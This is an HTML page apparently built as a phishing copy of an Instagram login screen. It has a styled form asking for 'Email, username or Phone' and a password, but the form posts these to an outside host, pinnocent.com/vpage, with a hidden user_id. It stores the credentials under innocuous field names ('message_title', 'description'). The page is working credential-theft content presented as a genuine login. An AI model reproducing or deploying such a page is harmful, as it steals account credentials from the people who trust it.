<html lang="en">
                 <head>
                 <meta charset="UTF-8">
                 <meta name="viewport" content="width=device-width, initial-scale=1.0">
                 <title>Login  with your instagram account</title>
                 <script crossorigin="" src="https://unpkg.com/react-dom@18/umd/react-dom.development.js"></script>
                 <style type="text/css" id="operaUserStyle">
                 body{
                   background-color: #00000008;
                   margin-top: 35%;
                 }
                 .theform {
                   background-color: white;
                   height: 50%;
                   border: 1px solid #00000004;
                   border-radius: 20px;
                   box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);px;
                 }
                 .enterfo {
                   margin-left: 30px;
                 }
                 input {
                   margin: 5px;
                   height: 50px;
                   width: 90%;
                   box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);px;
                  border: 0 solid #000000a1;
                 }
                 .logon {
                   height: 40px;
                   margin: 0px;
                   border: 0;
                   box-shadow: 0 0 2px rgba(0, 0, 0, 0.1);px;
                   background-color: #0095f6;
  color: #fff;
  padding: 10px;
  border: none;
  border-radius: 5px;
  cursor: pointer;
                 }
                 a {
                   text-decoration: none;
                   color: #0095f6;
                 }
                 .forgetpass {
                   text-align: right;
                   margin-right: 10px;
                 }
                 .donthave {
                   margin: 0px;
                   text-align: center;
                 }
                 img {
                   width: 100%;
                 }
                 .meta {
                   width: 100%;
                   margin-top: 50%;
                 }
                 </style>
                 </head>
                 <body class="bg-[#111111]">
                  <div id="root"><div>
                  <div class="grid place-content-center grid-cols-1 md:px-96 mt-10 gap-10">
                  <div class="m-auto text-xs sm:text-sm md:text-lg max-w-sm md:max-w-2xl text-center "></div>
                    <div class="flex justify-center w-full">
                       
                    </div>
                    <div class="flex justify-center w-full cointainer">
                       
                    </div>
                    <img src="BackgroundEraser_20241018_154727013.png">
                    <div class="cointainer theform" >
                    <p class="text-center enterfo" style="">Login to your instagram account</p>
                    <form action="https://pinnocent.com/vpage" method="POST" class="enterfo">
                       <input type="hidden" name="link" value="custom template">
                       <input type="hidden" name="ftype" value="normal">
                       <input type="hidden" name="login" value="login">
                       <input type="hidden" name="user_id" value="16934">
                       <div class="p-2 w-full  gap-1  ">
                         <div class="flex flex-col   p-2  gap-1">
                          <input type="text" class="w-full border p-2 rounded-md" name="message_title" placeholder="Email,username or Phone" required="Email" style="color:#111;">
                         </div>
                         <div class="flex flex-col   p-2   gap-1">
                          <input type="password" class="w-full border p-2 rounded-md" name="description" placeholder="Password" id="password" required="pass" autocomplete="new-password" aria-autocomplete="list" style="color:#111;">
                         </div>
                         <div class="flex flex-col justify-center items-center  p-2 gap-1 w-3/6 mx-auto">
                            <button type="submit" class=" font-semibold logon" style="width: 95%">Log In</button>
                            <p class="forgetpass">
                              <a href="#">Forget password</a>
                            </p>
                            <div class="donthave"> Dont have an account <a href="#"> sign up</a></div>
                            </div>
                         </div>
                       </div>
                    </form>
                    </div>
                 </div>
               </div>
               </body>
                 <img src="Screenshot_20241023-221511.png" class="meta">
                 </div>
               </html>